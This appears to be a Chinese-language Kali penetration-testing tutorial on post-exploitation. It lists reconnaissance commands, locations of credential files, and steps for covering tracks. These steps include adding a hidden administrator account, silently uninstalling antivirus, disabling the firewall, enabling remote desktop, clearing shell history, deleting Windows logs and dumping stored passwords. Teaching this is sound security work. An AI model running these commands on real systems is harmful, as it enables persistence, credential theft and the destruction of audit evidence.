Kali渗透测试之提权（四）——基本信息收集、敏感数据收集、隐藏痕迹

提权之后，需要收集目标系统的重要信息！！！

一、基本信息收集

（一）Linux

表白四联：whoami(我是谁)——>pwd（我在哪）——>uname -a（你是谁）

1.、cat /etc/resolv.conf
#查看DNS的配置文件

2、cat /etc/passwd
#查看密码文件，所有用户都有权限；

第1字段：用户名称
第2字段：密码标志
第3字段：UID（用户ID）

• 0 ： 超级用户
• 1-499 ： 系统用户（伪用户）
• 500-65535 ： 普通用户

第4字段 ： GID（用户初始组ID）
第5字段 ： 用户说明
第6字段 ： 家目录

• 普通用户 ： /home/用户名/
• 超级用户 ： /root/

第7字段 ： 登录之后的Shell

3、cat /etc/shadow
#查看密码文件，仅root用户可以查看

4、whoami
#查看当前用户

5、who -a
#-a 为all的意思，当前系统登录的用户，处理 /etc/utmp 文件或有全部信息的指定文件。等同于指定 -bdlprtTu 标志。

6、ifconfig -a
#查看所有的网卡信息

7、uname -a
#查看主机版本信息

8、iptables -L -n
#查看防火墙策略

9、netstat -nr
#查看网关及路由

10、ps aux
#列出所有进程

11、dpkg -l
#列出当前系统的软件包（ii：已安装，rc：未删干净）

（二）Windows

1、ipconfig /all
#查看所有网络适配器（即网卡信息）的TCP/IP配置

2、ipconfig /displaydns
#查看DNS缓存

3、netstat -bnao
#查看开放的端口及进程

4、netstat -r
#查看路由信息

5、net view
#查看共享资源列表

6、net view /domain
#查看域中的共享资源列表

7、net share
#查看共享列表

8、net accounts
#查看当前设置，密码要求，服务器角色

9、net user abc /add
#新建用户abc

10、net localgroup administrator abc /add
#将用户abc添加到本地管理员组

11、net localgroup administrators
#查看本地管理员组成员

（三）工具wmic

WMIC（Windows Management Instrumentation Command）

1、命令：wmic nicconfig get ipaddress,macaddress
#获取很低IP地址和MAC地址

2、命令：wmic computersystem get username
#获取计算机系统用户名

3、命令：wmic netlogin get name,lastlogon
#获取用户最近一次登录时间

4、命令：wmic process get caption,executablepath,commandline
#获取服务名称、路径及运行方式

5、wmic nteventlog get path,filename,writeable
#查看是否能修改删除日志

6、wmic product get name,version
#获取软件版本信息

7、wmic process where name=‘calc.exe’ call terminate
#关闭计算机进程

8、wmic os get name,servicepackmajorversion
#获取服务及对应数据包的版本

9、wmic product where name="" call uninstall /nointeractive
#卸载某些软件，如杀毒软件 ；nointeractive 后台静默运行

10、wmic share get /ALL
#获取软件的共享信息

11、wmic /node:“machinename” path Win32_TerminalServiceSetting where AllowTSConnections=“0” call SetAllowTSConnections “1”
#设置远程桌面连接

12、Netsh advfirewall set allprofiles state off
#关闭防火墙

二、敏感数据收集

1、Linux系统下的敏感数据

• /etc；/usr/local/etc —— >#配置文件放置目录
• /etc/passswd；/etc/shadow ——> #账号密码
• .ssh；cat /root/.ssh/known_hosts —— > 连接过的密钥。可利用进入对方的系统;
• 业务数据库 ；身份认证服务器数据库
• .gnupg ——> 公私钥;
• /tmp ——> #linux中的临时目录，存放临时数据有可能泄露机密数据;

2、Windows系统

• SAM数据库 ——> 注册表文件;
• %SYSTEMROOT%\repair\SAM ——> #SAM进行修复操作时，保存SAM副本;
• %SYSTEMROOT%\system32\config\regback\SAM ——> #注册表备份;
• 业务数据库 ； 身份认证数据库
• 临时文件目录 ——> #病毒经常驻留的地方
• UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

三、隐藏痕迹

（一）Linux系统

1、cat /root/.bash_history
#查看历史消息文件

2、history -c
#清除命令的历史记录

3、rm .bash_history
#删除存放历史记录的文件

4、查看身份认证（kali和RHEL、cent OS 操作系统的身份认证存放路径不同）

• 4.1> Kali系统：cat /var/log/auth.log

• 4.2>R ed Hat 6.5/cent OS系统：cat /var/log/secure
  #查看安全日志

5、记录相关日志：

• file /var/log/btmp ——> #记录错误登录日志
• file /var/log/faillog ——> #记录登录失败日志
• file /var/log/lastlog ——> #记录最后一次的登录日志
• file /var/log/wtmp ——> 是一个二进制文件，记录每个用户的登录次数和持续时间等信息;
• file faillog ——> 登录失败日志；

6、RDP连接记录

• 远程桌面协议（RDP, Remote Desktop Protocol）是一个多通道（multi-channel）的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。大部分的Windows都有客户端所需软件。其他操作系统也有这些客户端软件，例如Linux、FreeBSD、Mac OS X。服务端电脑方面，则听取送到TCP3389端口的数据。
• RDP记录着与谁曾经使用过远程连接；

6.1> 命令6：rdesktop ip地址

6.2> reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"

6.3> 查看目标机上浏览器以及邮箱的密码

- EmailPasswordDump.exe

- BrowserPasswordDump.exe

（二）Win XP：禁止在登录界面显示新建的账户

禁止账户最好是系统默认的账户，且必须是管理员！！！

1、查看登录界面显示的用户；

2、禁止用户userX在界面显示；

命令：reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts\UserList” /v administrator /T
REG_DWORD /D 0

3、再次查看登录界面显示的用户；

将账户注销后，进行重启登录！！！

4、将禁止的administrator管理员，进行重新显示；

5、最后禁止的administrator管理员账户重新显示；

4、清除日志信息；

del %windir%*.log /a/s/q/f ——> #强制地、安静地、不加提示地删除日志